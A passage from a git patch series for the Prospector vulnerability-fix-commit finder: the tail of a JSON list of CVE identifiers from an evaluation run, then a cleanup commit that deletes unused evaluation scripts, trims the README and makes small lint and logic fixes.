"CVE-2017-17837", + "CVE-2017-18076", + "CVE-2017-18077", + "CVE-2017-18361", + "CVE-2017-18635", + "CVE-2017-1000001", + "CVE-2017-1000056", + "CVE-2017-1000069", + "CVE-2017-1000070", + "CVE-2017-1000209", + "CVE-2017-1000246", + "CVE-2017-1000248", + "CVE-2017-1000427", + "CVE-2017-1000433", + "CVE-2017-1000450", + "CVE-2018-0737", + "CVE-2018-1067", + "CVE-2018-1114", + "CVE-2018-1199", + "CVE-2018-1272", + "CVE-2018-1273", + "CVE-2018-1274", + "CVE-2018-1284", + "CVE-2018-1336", + "CVE-2018-3711", + "CVE-2018-3777", + "CVE-2018-5773", + "CVE-2018-6517", + "CVE-2018-6596", + "CVE-2018-7212", + "CVE-2018-7489", + "CVE-2018-7575", + "CVE-2018-7711", + "CVE-2018-7750", + "CVE-2018-8006", + "CVE-2018-8009", + "CVE-2018-8014", + "CVE-2018-8017", + "CVE-2018-8025", + "CVE-2018-8027", + "CVE-2018-8030", + "CVE-2018-8037", + "CVE-2018-8038", + "CVE-2018-8039", + "CVE-2018-8088", + "CVE-2018-8097", + "CVE-2018-8416", + "CVE-2018-8899", + "CVE-2018-9856", + "CVE-2018-10237", + "CVE-2018-11039", + "CVE-2018-11040", + "CVE-2018-11248", + "CVE-2018-11307", + "CVE-2018-11627", + "CVE-2018-11647", + "CVE-2018-11761", + "CVE-2018-11762", + "CVE-2018-11775", + "CVE-2018-11784", + "CVE-2018-11786", + "CVE-2018-11787", + "CVE-2018-11788", + "CVE-2018-11797", + "CVE-2018-12022", + "CVE-2018-12023", + "CVE-2018-12537", + "CVE-2018-12540", + "CVE-2018-12544", + "CVE-2018-12608", + "CVE-2018-13863", + "CVE-2018-14040", + "CVE-2018-14042", + "CVE-2018-14371", + "CVE-2018-14574", + "CVE-2018-14635", + "CVE-2018-14731", + "CVE-2018-14774", + "CVE-2018-15727", + "CVE-2018-15756", + "CVE-2018-16468", + "CVE-2018-16471", + "CVE-2018-16733", + "CVE-2018-16837", + "CVE-2018-16859", + "CVE-2018-16876", + "CVE-2018-16886", + "CVE-2018-16984", + "CVE-2018-17057", + "CVE-2018-17175", + "CVE-2018-17246", + "CVE-2018-18074", + "CVE-2018-18206", + "CVE-2018-18854", + "CVE-2018-18893", + "CVE-2018-18926", + "CVE-2018-19133", + "CVE-2018-19351", + "CVE-2018-19352", + "CVE-2018-19370", + "CVE-2018-19620", + "CVE-2018-20000", + "CVE-2018-20227", + "CVE-2018-20745", + "CVE-2018-20756", + "CVE-2018-20834", + "CVE-2018-20975", + "CVE-2018-1000060", + "CVE-2018-1000088", + "CVE-2018-1000096", + "CVE-2018-1000118", + "CVE-2018-1000159", + "CVE-2018-1000539", + "CVE-2018-1000559", + "CVE-2018-1000613", + "CVE-2018-1000644", + "CVE-2018-1000665", + "CVE-2018-1000803", + "CVE-2018-1000809", + "CVE-2018-1000820", + "CVE-2018-1000822", + "CVE-2018-1000855", + "CVE-2018-1000872", + "CVE-2018-1002101", + "CVE-2018-1002105", + "CVE-2018-1002150", + "CVE-2018-1002200", + "CVE-2018-1002203", + "CVE-2018-1002204", + "CVE-2018-1002205", + "CVE-2019-0194", + "CVE-2019-0201", + "CVE-2019-0210", + "CVE-2019-0228", + "CVE-2019-1552", + "CVE-2019-3465", + "CVE-2019-3498", + "CVE-2019-3888", + "CVE-2019-5421", + "CVE-2019-5448", + "CVE-2019-5477", + "CVE-2019-6802", + "CVE-2019-6975", + "CVE-2019-7313", + "CVE-2019-8903", + "CVE-2019-9153", + "CVE-2019-9154", + "CVE-2019-9512", + "CVE-2019-9826", + "CVE-2019-9942", + "CVE-2019-10072", + "CVE-2019-10086", + "CVE-2019-10094", + "CVE-2019-10184", + "CVE-2019-10206", + "CVE-2019-10219", + "CVE-2019-10246", + "CVE-2019-10247", + "CVE-2019-10249", + "CVE-2019-10255", + "CVE-2019-10641", + "CVE-2019-10768", + "CVE-2019-10773", + "CVE-2019-10774", + "CVE-2019-10806", + "CVE-2019-10874", + "CVE-2019-10912", + "CVE-2019-11082", + "CVE-2019-11244", + "CVE-2019-11245", + "CVE-2019-11325", + "CVE-2019-11405", + "CVE-2019-11458", + "CVE-2019-11470", + "CVE-2019-11808", + "CVE-2019-12041", + "CVE-2019-12086", + "CVE-2019-12308", + "CVE-2019-12313", + "CVE-2019-12387", + "CVE-2019-12418", + "CVE-2019-12422", + "CVE-2019-12781", + "CVE-2019-14262", + "CVE-2019-14892", + "CVE-2019-14933", + "CVE-2019-15062", + "CVE-2019-15477", + "CVE-2019-15482", + "CVE-2019-15483", + "CVE-2019-15484", + "CVE-2019-15485", + "CVE-2019-15486", + "CVE-2019-15587", + "CVE-2019-15599", + "CVE-2019-15782", + "CVE-2019-16060", + "CVE-2019-16097", + "CVE-2019-16145", + "CVE-2019-16403", + "CVE-2019-16768", + "CVE-2019-16770", + "CVE-2019-16772", + "CVE-2019-16774", + "CVE-2019-16782", + "CVE-2019-16869", + "CVE-2019-16884", + "CVE-2019-16942", + "CVE-2019-16943", + "CVE-2019-17206", + "CVE-2019-17383", + "CVE-2019-17426", + "CVE-2019-17563", + "CVE-2019-17569", + "CVE-2019-17632", + "CVE-2019-18841", + "CVE-2019-18886", + "CVE-2019-18887", + "CVE-2019-18888", + "CVE-2019-18923", + "CVE-2019-18954", + "CVE-2019-19118", + "CVE-2019-19274", + "CVE-2019-19325", + "CVE-2019-19844", + "CVE-2019-20444", + "CVE-2019-1000007", + "CVE-2019-1002101", + "CVE-2019-1010142", + "CVE-2019-1010306", + "CVE-2020-1935", + "CVE-2020-1940", + "CVE-2020-5215", + "CVE-2020-5223", + "CVE-2020-5230", + "CVE-2020-5233", + "CVE-2020-5237", + "CVE-2020-5243", + "CVE-2020-5245", + "CVE-2020-5247", + "CVE-2020-5310", + "CVE-2020-5311", + "CVE-2020-5312", + "CVE-2020-5313", + "CVE-2020-5398", + "CVE-2020-6802", + "CVE-2020-6816", + "CVE-2020-7212", + "CVE-2020-7219", + "CVE-2020-7598", + "CVE-2020-7608", + "CVE-2020-8116", + "CVE-2020-8840", + "CVE-2020-8945", + "CVE-2020-9402", + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548", + "CVE-2020-10594" + ], + "aborted": [ + "CVE-2009-0217", + "CVE-2015-1169", + "CVE-2015-3208", + "CVE-2015-6826", + "CVE-2015-7577", + "CVE-2016-5386", + "CVE-2017-5643", + "CVE-2017-8658", + "CVE-2017-14695", + "CVE-2018-10055", + "CVE-2018-11804", + "CVE-2018-20713", + "CVE-2018-1002102", + "CVE-2019-10154" + ], + "missing": [ + "CVE-2009-0217", + "CVE-2015-1169", + "CVE-2015-3208", + "CVE-2015-6826", + "CVE-2015-7577", + "CVE-2016-5386", + "CVE-2017-5643", + "CVE-2017-8658", + "CVE-2017-14695", + "CVE-2018-10055", + "CVE-2018-11804", + "CVE-2018-20713", + "CVE-2018-1002102", + "CVE-2019-10154" + ] + } + } + ] +} \ No newline at end of file diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 829b74ddf..335a332b5 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -29,7 +29,7 @@ def load_json_file(path: str) -> dict: def save_dict_to_json(dictionary: dict, path: str): - with open(path, "w") as file: + with open(path, "w+") as file: return json.dump(dictionary, file, indent=4) From e0e494455a552544dfca36f37711ca0181305f2d Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 30 Aug 2024 12:26:45 +0000 Subject: [PATCH 130/130] [IMP] cleans up code and removes all unused or unimportant files --- prospector/evaluation/README.md | 15 +- prospector/evaluation/analyse.py | 8 +- prospector/evaluation/analyse_statistics.py | 10 - prospector/evaluation/cloning_repos.py | 30 --- prospector/evaluation/compare.py | 266 -------------------- prospector/evaluation/compare_reports.py | 133 ---------- prospector/evaluation/create_jobs.py | 160 ------------ prospector/evaluation/dispatch_jobs.py | 3 +- prospector/evaluation/extract_errors.py | 26 -- prospector/rules/rules.py | 8 +- 10 files changed, 9 insertions(+), 650 deletions(-) delete mode 100644 prospector/evaluation/cloning_repos.py delete mode 100644 prospector/evaluation/compare.py delete mode 100644 prospector/evaluation/compare_reports.py delete mode 100644 prospector/evaluation/create_jobs.py delete mode 100644 prospector/evaluation/extract_errors.py diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md index 3aaaf5d27..5eb7bc7af 100644 --- a/prospector/evaluation/README.md +++ b/prospector/evaluation/README.md @@ -1,6 +1,6 @@ # Evaluate Prospector -This folder contains the scripts used for evaluating Prospector's reports (created and used in Summer 2024). The folder is structured as follows: +This folder contains the scripts used for evaluating Prospector's reports and data needed for it (created and used in Summer 2024). The folder is structured as follows: 1. **Data** folder: contains input data, Prospector reports and results of the analysis of the Prospector reports. 2. **Scripts**: The scripts used for running Prospector on a batch of CVEs, and for analysing the created reports. @@ -24,19 +24,6 @@ them in a Redis Queue, from which the `prospector_worker` container fetches jobs You can set the number of workers in `docker/worker/etc_supervisor_confd_rqworker.conf.j2`. -## Command Line Options - -All scripts are called from `main.py`, depending on the CL flags that are set. The following flags can be set: - -1. `-i`: Sets the filename of the file in the input data path. -2. `-c`: Allows you to select a subset of CVEs, instead of all CVEs from the input data (eg. `-c CVE-2020-1925, CVE-2018-1234`) -3. `-e`: For *execute*, dispatched jobs for all CVEs from the input data (or the subset if `-c` is set) to the Redis Queue (`dispatch_jobs.py`). -4. `-a`: Analyses the reports created by Propsector (`analysis.py`) -5. `-a -s`: Analyses the statistics part of the Prospector reports (eg. to analyse execution times, `analyse_statistics.py`) -6. `-a --flow`: Creates a JSON file showing how the reports change categories between two different executions. -6. `-eq`: For *empty queue*, to empty the jobs left on the queue. -7. `-co`: For *count*, to count how many of the CVEs in the input data have a corresponding report. - ## Configuration File The configuration file has two parts to it: a main part and a Prospector settings part, which is a copy of a part of the original Prospector `config.yaml` file. diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index c1db5590e..4104be1a1 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -80,7 +80,7 @@ def analyse_prospector_reports(filename: str, selected_cves: str): # Keep track of the CVEs where there is no report file reports_not_found = [] - #### Data to insert into table + # Data to insert into table if BATCH in ["regular", "old_code"]: results = { "high": [], @@ -620,7 +620,7 @@ def generate_checkmarks_table(input_dataset: str, selected_cves): rule_checks = {rule: "" for rule in all_rules} for r in matched_rules: - rule_checks[r] = "\checkmark" + rule_checks[r] = "\checkmark" # noqa: W605 row.extend([rule_checks[r] for r in all_rules]) row.extend([str(overall_exectime), str(llm_exectime)]) @@ -785,9 +785,7 @@ def generate_sankey_diagram(file1: str, file2: str, file3: str): height=800, ) - output_file = ( - ANALYSIS_RESULTS_PATH + f"sankey-{file1}-{file2}-{file3}.png" - ) + output_file = ANALYSIS_RESULTS_PATH + f"sankey-{file1}-{file2}-{file3}.png" # Save as PNG write_image(fig, output_file) print(f"Sankey diagram saved to {output_file}") diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index ab8181c4f..edfc566cd 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -63,16 +63,6 @@ def analyse_statistics(filename: str): # noqa: C901 avg_cc_time = sum(cc_times) / len(cc_times) avg_total_cc_time = sum(total_cc_times) / len(total_cc_times) - # How many commits was the commit classification rule applied to? - for itm in dataset: - filepath = PROSPECTOR_REPORTS_PATH_HOST + filename + f"/{itm[0]}.json" - try: - cc_num_commits = _get_cc_num_commits(filepath) - break - - except FileNotFoundError: - continue - execution_data = { "timestamp": datetime.now().strftime("%H:%M:%S"), "total_files_found": len(repo_times), diff --git a/prospector/evaluation/cloning_repos.py b/prospector/evaluation/cloning_repos.py deleted file mode 100644 index 99581741a..000000000 --- a/prospector/evaluation/cloning_repos.py +++ /dev/null @@ -1,30 +0,0 @@ -from evaluation.utils import load_dataset -from git.git import clone_repo_multiple - - -# Get the URLs from d63.csv -> set -urls = set() -dataset = load_dataset( - "/home/i748376/prospector/project-kb/prospector/evaluation/data/input/d63.csv" -) - -for cve_record in dataset: - urls.add(cve_record[1]) - -urls = list(urls) -urls = [ - "https://github.com/hueniverse/undefsafe", -] - -print(f"Retrieved {len(urls)} distinct repositories from the dataset.") - -# Call clone_repo_multiple() on this set -results = clone_repo_multiple( - urls, - output_folder="/home/i748376/data/gitcache", - skip_existing=False, - shallow=False, - concurrent=1, -) - -print("Cloning completed. Results: ", results) diff --git a/prospector/evaluation/compare.py b/prospector/evaluation/compare.py deleted file mode 100644 index 76da0a928..000000000 --- a/prospector/evaluation/compare.py +++ /dev/null @@ -1,266 +0,0 @@ -# Compare a list of Prospector JSON reports to their counterparts -# - to find out which reports have changed since D63 and what the difference is -from datetime import datetime -import json -import os -from evaluation.utils import ( - ANALYSIS_RESULTS_PATH, - load_dataset, - logger, - config, - load_json_file, -) - - -def is_same_report(report1, report2) -> bool: - json1 = load_json_file(report1) - json2 = load_json_file(report2) - return json1 == json2 - - -def has_candidates(path: str) -> bool: - report = load_json_file(path) - return len(report["commits"]) > 0 - - -def is_first_candidate_same(path1: str, path2: str) -> bool: - report1 = load_json_file(path1) - report2 = load_json_file(path2) - - if not has_candidates(path1) and has_candidates(path2): - return True - - if not has_candidates(path1) or not has_candidates(path2): - return False - - id1 = report1["commits"][0]["commit_id"] - id2 = report2["commits"][0]["commit_id"] - - same = id1 == id2 - - if not same and report1["commits"][0]["twins"]: - # Check if they are twins - twins_report1 = [twin[1] for twin in report1["commits"][0]["twins"]] - if id2 in twins_report1: - same = True - - return same - - -def references_are_same(path1: str, path2: str) -> bool: - report1 = load_json_file(path1) - report2 = load_json_file(path2) - - return ( - report1["advisory_record"]["references"] - == report2["advisory_record"]["references"] - ) - - -def candidate_in_both(path1: str, path2: str) -> bool: - report1 = load_json_file(path1) - report2 = load_json_file(path2) - - report2_candidates = [commit["commit_id"] for commit in report2["commits"]] - if report1["commits"][0]["commit_id"] in report2_candidates: - return True - - return False - - -def tags_are_same(path1: str, path2: str) -> bool: - report1 = load_json_file(path1) - report2 = load_json_file(path2) - - id_first_candidate1 = report1["commits"][0]["commit_id"] - tags_first_candidate1 = report1["commits"][0]["tags"] - - for commit in report2["commits"]: - if commit["commit_id"] == id_first_candidate1: - return tags_first_candidate1 == commit["tags"] - - return False - - -def main(): - directory1 = config.compare_directory1 - directory2 = config.compare_directory2 - - logger.info(f"Comparing reports in {directory1} and {directory2}.") - - file = "evaluation/data/input/d63.csv" - dataset = load_dataset(file) - - ## Things to measure - counterpart_exists = [] - missing_in_directory1 = [] - missing_in_directory2 = [] - - missing_in_1_compared_to_gt = [] - missing_in_2_compared_to_gt = [] - - entirely_same = [] - same_references = [] - same_first_candidate = [] - different_first_candidate = [] - has_no_candidates = [] - - # Different first candidate - dfc_references = [] - dfc_first_candidate_not_in_counterpart = [] - dfc_not_in_counterpart_despite_same_references = [] - dfc_not_in_counterpart_despite_same_tags = [] - dfc_tags_and_refs = [] - dfc_only_tags = [] - - # Get reports from first directory - reports1 = [f for f in os.listdir(directory1)] - # get reports from second directory - reports2 = [f for f in os.listdir(directory2)] - - # Get how many reports are missing compared to the ground truth - for report in dataset: - if f"{report[0]}.json" not in reports1: - missing_in_1_compared_to_gt.append(report[0]) - - if f"{report[0]}.json" not in reports2: - missing_in_2_compared_to_gt.append(report[0]) - - for report in reports1: - if report not in reports2: - missing_in_directory2.append(report) - continue - - counterpart_exists.append(report) - reports2.remove(report) - - if is_same_report(directory1 + report, directory2 + report): - entirely_same.append(report) - same_references.append(report) - same_first_candidate.append(report) - continue - - if is_first_candidate_same(directory1 + report, directory2 + report): - same_first_candidate.append(report) - continue - - # Reports have different first candidates - different_first_candidate.append(report) - - # because of different references - if not references_are_same(directory1 + report, directory2 + report): - dfc_references.append(report) - - # because one of the reports has no ranked candidates - if not has_candidates(directory1 + report): - has_no_candidates.append((report, "directory 1")) - continue - elif not has_candidates(directory2 + report): - has_no_candidates.append((report, "directory 2")) - continue - - if not candidate_in_both(directory1 + report, directory2 + report): - dfc_first_candidate_not_in_counterpart.append(report) - if report not in dfc_references: - dfc_not_in_counterpart_despite_same_references.append(report) - elif report not in (dfc_tags_and_refs + dfc_only_tags): - dfc_not_in_counterpart_despite_same_tags.append(report) - continue - - # because of different tags - if not tags_are_same(directory1 + report, directory2 + report): - if report in dfc_references: - dfc_tags_and_refs.append(report) - else: - dfc_only_tags.append(report) - continue - - print(report) - - missing_in_directory1 = reports2 - - # Prepare results - results = { - "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), - "directory1": directory1, - "directory2": directory2, - "directory1_vs_gt": { - "count": len(missing_in_1_compared_to_gt), - "reports": missing_in_1_compared_to_gt, - }, - "directory2_vs_gt": { - "count": len(missing_in_2_compared_to_gt), - "reports": missing_in_2_compared_to_gt, - }, - "counterparts_exist": len(counterpart_exists), - "missing_in_directory1": { - "count": len(missing_in_directory1), - "reports": missing_in_directory1, - }, - "missing_in_directory2": { - "count": len(missing_in_directory2), - "reports": missing_in_directory2, - }, - "reports_comparison": { - "entirely_same": len(entirely_same), - "same_first_candidate": { - "count": len(same_first_candidate), - }, - "different_first_candidate": { - "count": len(different_first_candidate), - "reports": different_first_candidate, - "of_which_have_different_references": { - "count": len(dfc_references), - "reports": dfc_references, - }, - "of_which_have_different_tags": { - "count": len(dfc_only_tags), - "reports": dfc_only_tags, - }, - "one_report_has_no_candidates_at_all": { - "count": len(has_no_candidates), - "reports": has_no_candidates, - }, - "first_candidate_not_in_counterpart": { - "count": len(dfc_first_candidate_not_in_counterpart), - "reports": dfc_first_candidate_not_in_counterpart, - "of_which_have_same_references": { - "count": len( - dfc_not_in_counterpart_despite_same_references - ), - "reports": dfc_not_in_counterpart_despite_same_references, - }, - "of_which_have_same_tags": { - "count": len( - dfc_not_in_counterpart_despite_same_tags, - ), - "reports": dfc_not_in_counterpart_despite_same_tags, - }, - }, - }, - }, - } - - # Append results to JSON file - output_path = os.path.join(ANALYSIS_RESULTS_PATH, "reports_comparison.json") - - try: - with open(output_path, "r") as f: - existing_data = json.load(f) - - except (FileNotFoundError, json.JSONDecodeError): - existing_data = {"reports_comparison": []} - - # Append new result - existing_data["reports_comparison"].append(results) - - # Write results to JSON file - output_path = os.path.join(ANALYSIS_RESULTS_PATH, "reports_comparison.json") - with open(output_path, "w") as f: - json.dump(existing_data, f, indent=2) - - logger.info(f"Comparison results written to {output_path}") - - -if __name__ == "__main__": - main() diff --git a/prospector/evaluation/compare_reports.py b/prospector/evaluation/compare_reports.py deleted file mode 100644 index c27a0e196..000000000 --- a/prospector/evaluation/compare_reports.py +++ /dev/null @@ -1,133 +0,0 @@ -# This script compares the reports of the same CVEs for two different batches -# of reports. It uses the flow-analysis.json file generated by the analysis.py -# file to have a list of CVEs that are classified differently in both batches. - - -from collections import Counter -from evaluation.utils import ( - ANALYSIS_RESULTS_PATH, - logger, - config, - load_json_file, -) - - -def process_cve(cve, from_category, to_category): - is_diff_order = False - is_same_rules = False - # Find Matteo's code report and my report - try: - matteo_report = load_json_file( - f"../../../data/prospector_reports/reports_now_with_matteos_code/{cve}.json" - ) - my_report = load_json_file( - f"../../../data/prospector_reports/reports_without_llm_mvi/{cve}.json" - ) - - except Exception as e: - # print(f"Couldn't open a report: {e}") - pass - - # Get lists of the candidates - matteo_candidate_list = [ - commit["commit_id"] for commit in matteo_report["commits"] - ] - - my_candidate_list = [commit["commit_id"] for commit in my_report["commits"]] - - if _same_elements(matteo_candidate_list, my_candidate_list): - print(f"Processing: {cve}, from {from_category} to {to_category}") - print(f"Same ranked candidates for {cve}") - # Are they also ordered the same? - if matteo_candidate_list != my_candidate_list: - print(f"Same candidates, but ranked differently!") - - is_diff_order = True - print("---") - - # They are not the same candidates, the reports found different candidates - else: - # Do the first 10 candidates match the same rules? - matteo_relevance_scores = [ - sum([rule["relevance"] for rule in commit["matched_rules"]]) - for commit in matteo_report["commits"][:10] - ] - my_relevance_scores = [ - sum([rule["relevance"] for rule in commit["matched_rules"]]) - for commit in my_report["commits"][:10] - ] - if matteo_relevance_scores == my_relevance_scores: - print(f"Processing: {cve}, from {from_category} to {to_category}") - print( - f"First ten candidates have equal relevances for {cve}: {my_relevance_scores}" - ) - # print(f"Candidates Matteo: {matteo_candidate_list[:10]}") - is_same_rules = True - print("---") - # print(f"Candidates Me: {my_candidate_list[:10]}") - - else: - num_same, list_different = _count_same_elements( - matteo_candidate_list, my_candidate_list - ) - # print(f"{num_same} candidates are the same: {list_different}") - # print(f"{num_same} candidates are the same.") - - return is_diff_order, is_same_rules - - -def _same_elements(list1: list, list2: list): - set1 = set(list1) - set2 = set(list2) - - # Check if one set is a subset of the other - return set1.issubset(set2) or set2.issubset(set1) - - -def _count_same_elements(list1, list2): - num_different = len(set(list1) & set(list2)) - - min_length = min(len(list1), len(list2)) - - result = [] - for i in range(min_length): - if list1[i] == list2[i]: - result.append("S") - else: - result.append("D") - - return num_different, result - - -def main(): - # Get all the different CVEs from the flow analysis - flow_analysis_data = load_json_file( - "evaluation/data/results/summary_execution/flow-analysis.json" - ) - different_candidate_order = [] - different_candidates_matching_same_rules = [] - # Iterate through these CVEs - for outer_key, outer_value in flow_analysis_data.items(): - for inner_key, cve_list in outer_value.items(): - for cve in cve_list: - try: - is_diff_order, is_same_rules = process_cve( - cve, outer_key, inner_key - ) - if is_diff_order: - different_candidate_order.append(cve) - if is_same_rules: - different_candidates_matching_same_rules.append(cve) - except: - continue - - print( - f"Same candidates, but differently ordered: {different_candidate_order}" - ) - print( - f"Different candidates, but equivalent relevance score in first 10 candidates: {different_candidate_order}" - ) - - -if __name__ == "__main__": - main() diff --git a/prospector/evaluation/create_jobs.py b/prospector/evaluation/create_jobs.py deleted file mode 100644 index e036133f2..000000000 --- a/prospector/evaluation/create_jobs.py +++ /dev/null @@ -1,160 +0,0 @@ -import json -import sys -import time -from datetime import datetime - -import redis -import requests -from rq import Connection, Queue, get_current_job - -from backenddb.postgres import PostgresBackendDB -from core.prospector import prospector -from core.report import generate_report -from llm.llm_service import LLMService -from log.logger import logger -from util.config_parser import parse_config_file - -from evaluation.utils import ( - PROSPECTOR_REPORTS_PATH_CONTAINER, - logger, - config, -) - -prospector_config = config.prospector_settings - - -async def enqueue_jobs(): - db = connect_to_db() - processed_vulns = db.get_processed_vulns_not_in_job() - print(processed_vulns) - created_by = "Auto" - for processed_vuln in processed_vulns: - pv_id = processed_vuln["_id"] - pv_repository = processed_vuln["repository"] - pv_versions = processed_vuln["versions"] - v_vuln_id = processed_vuln["vuln_id"] - - try: - job = _create_prospector_job(v_vuln_id, pv_repository, pv_versions) - except Exception: - logger.error( - "error while creating automatically the jobs", exc_info=True - ) - - try: - db.save_job( - job.get_id(), - pv_id, - job.args, - job.created_at, - job.started_at, - job.ended_at, - job.result, - created_by, - job.get_status(refresh=True), - ) - except Exception: - logger.error( - "error while saving automatically the jobs", exc_info=True - ) - - db.disconnect() - - -def _create_prospector_job(vuln_id, repo, version, at_front=False): - with Connection(redis.from_url(prospector_config.redis_url)): - queue = Queue(default_timeout=800) - if at_front: - job = queue.enqueue( - _run_prospector_and_generate_report, - args=(vuln_id, repo, version), - at_front=True, - ) - else: - job = queue.enqueue( - _run_prospector_and_generate_report, - args=(vuln_id, repo, version), - ) - - return job - - -def _run_prospector_and_generate_report(vuln_id, repo_url, v_int): - job = get_current_job() - job_id = job.get_id() - url = f"{prospector_config.backend}/jobs/{job_id}" - data = { - "status": job.get_status(), - "started_at": job.started_at.isoformat(), - } - - try: - response = requests.put(url, json=data) - if response.status_code == 200: - response_object = response.json() - print(response_object) - else: - print("Error:", response.status_code) - except requests.exceptions.RequestException as e: - print("Error:", e) - - params = { - "vulnerability_id": vuln_id, - "repository_url": repo_url, - "version_interval": v_int, - "use_backend": True, - "backend_address": prospector_config.backend, - "git_cache": "/tmp/gitcache", - "limit_candidates": 2000, - "use_llm_repository_url": False, - "enabled_rules": prospector_config.enabled_rules, - } - - try: - LLMService(prospector_config.llm_service) - except Exception as e: - logger.error(f"LLM Service could not be instantiated: {e}") - raise e - - try: - results, advisory_record = prospector(**params) - generate_report( - results, - advisory_record, - "json", - f"{PROSPECTOR_REPORTS_PATH_CONTAINER}{vuln_id}.json", - prospector_params=params, - ) - status = "finished" - results = f"data_sources/reports/{vuln_id}_{job_id}" - except Exception as e: - status = "failed" - results = None - logger.error(f"job failed during execution: {e}") - finally: - end_time = datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f") - print(job_id, status, end_time, results) - data = {"status": status, "finished_at": end_time, "results": results} - try: - response = requests.put(url, json=data) - if response.status_code == 200: - response_object = response.json() - print(response_object) - else: - print("Error:", response.status_code) - except requests.exceptions.RequestException as e: - print("Error:", e) - - return f"data_sources/reports/{vuln_id}_{job_id}" - - -def connect_to_db(): - db = PostgresBackendDB( - prospector_config.database.user, - prospector_config.database.password, - prospector_config.database.host, - prospector_config.database.port, - prospector_config.database.dbname, - ) - db.connect() - return db diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 6186c4e8e..62a4b7f19 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -6,7 +6,6 @@ from core.prospector import prospector from core.report import generate_report -from evaluation.create_jobs import _create_prospector_job, enqueue_jobs from evaluation.utils import ( INPUT_DATA_PATH, PROSPECTOR_REPORTS_PATH_HOST, @@ -101,7 +100,7 @@ def _run_prospector_and_generate_report( logger.error(f"prospector() crashed at {cve_id}: {e}") raise e - logger.info(f"prospector() returned. Generating report now.") + logger.info("prospector() returned. Generating report now.") try: generate_report( diff --git a/prospector/evaluation/extract_errors.py b/prospector/evaluation/extract_errors.py deleted file mode 100644 index 545ab0e41..000000000 --- a/prospector/evaluation/extract_errors.py +++ /dev/null @@ -1,26 +0,0 @@ -import re - -from evaluation.utils import ( - INPUT_DATA_PATH, - ANALYSIS_RESULTS_PATH, - load_dataset, -) - - -def extract_crash_lines(log_file_path, output_file_path): - crash_pattern = re.compile(r".*prospector\(\) crashed at.*") - - with open(log_file_path, "r") as log_file, open( - output_file_path, "a" - ) as output_file: - for line in log_file: - if crash_pattern.match(line): - output_file.write(line) - - -# Usage -log_file_path = f"evaluation.log" -output_file_path = f"{ANALYSIS_RESULTS_PATH}error_lines.log" - -extract_crash_lines(log_file_path, output_file_path) -print(f"Error lines have been extracted to {output_file_path}") diff --git a/prospector/rules/rules.py b/prospector/rules/rules.py index aee22fbdb..cdc1d8d64 100644 --- a/prospector/rules/rules.py +++ b/prospector/rules/rules.py @@ -452,10 +452,10 @@ def apply( r.raise_for_status() commit_data = r.json()[0] - # is_security_relevant = commit_data.get("security_relevant") - # if is_security_relevant is not None: - # candidate.security_relevant = is_security_relevant - # return is_security_relevant + is_security_relevant = commit_data.get("security_relevant") + if is_security_relevant is not None: + candidate.security_relevant = is_security_relevant + return is_security_relevant candidate.security_relevant = LLMService().classify_commit( candidate.diff, candidate.repository, candidate.message